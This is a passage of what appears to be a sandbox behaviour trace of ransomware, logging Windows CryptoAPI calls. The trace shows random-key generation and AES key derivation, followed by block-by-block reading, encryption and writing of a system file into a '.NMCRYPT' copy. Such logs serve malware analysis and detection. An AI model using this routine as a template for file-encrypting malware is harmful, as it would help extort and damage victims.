hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.803] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0169.803] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0169.805] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0169.805] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.805] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad638) returned 1 [0169.805] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0169.805] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0169.805] wcslen (_String="\\\\?\\") returned 0x4 [0169.805] CryptDuplicateKey (in: hKey=0x9ad638, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad478) returned 1 [0169.805] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0169.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0169.856] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=6656) returned 1 [0169.856] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0169.857] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.859] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.859] GetLastError () returned 0x0 [0169.859] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.863] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.864] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.864] GetLastError () returned 0x0 [0169.864] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.864] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.864] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.864] GetLastError () returned 0x0 [0169.864] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.864] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.864] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.864] GetLastError () returned 0x0 [0169.864] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.864] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.865] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.865] GetLastError () returned 0x0 [0169.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.865] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.865] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.865] GetLastError () returned 0x0 [0169.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.865] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.865] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.865] GetLastError () returned 0x0 [0169.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.865] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.865] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.865] GetLastError () returned 0x0 [0169.866] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.866] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.866] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.866] GetLastError () returned 0x0 [0169.866] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.866] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.866] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.866] GetLastError () returned 0x0 [0169.866] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.866] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.866] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.866] GetLastError () returned 0x0 [0169.866] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.866] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.867] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.867] GetLastError () returned 0x0 [0169.867] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.867] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.867] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.867] GetLastError () returned 0x0 [0169.867] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.867] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.867] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.867] GetLastError () returned 0x0 [0169.867] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.867] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.867] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.867] GetLastError () returned 0x0 [0169.867] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.868] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.868] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.868] GetLastError () returned 0x0 [0169.868] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.868] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.868] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.868] GetLastError () returned 0x0 [0169.868] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.868] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.869] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.869] GetLastError () returned 0x0 [0169.869] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.869] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.869] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.869] GetLastError () returned 0x0 [0169.869] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.869] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.869] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.869] GetLastError () returned 0x0 [0169.869] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.869] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.869] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.869] GetLastError () returned 0x0 [0169.869] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.870] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.870] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.870] GetLastError () returned 0x0 [0169.870] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.870] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.870] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, 